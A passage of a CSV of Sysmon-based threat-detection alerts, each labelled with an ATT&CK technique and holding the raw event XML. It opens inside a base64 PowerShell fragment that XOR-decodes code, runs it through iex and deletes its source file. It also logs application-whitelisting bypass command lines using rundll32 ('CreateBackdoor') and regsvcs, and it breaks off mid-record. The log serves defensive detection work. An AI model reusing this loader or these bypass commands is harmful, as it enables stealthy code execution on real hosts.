0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8
AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
</TimeCreated>
<EventRecordID>20</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:29.646278Z"">
</TimeCreated>
<EventRecordID>4920</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.893</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010349B8800</Data>
<Data Name=""ProcessId"">6552</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
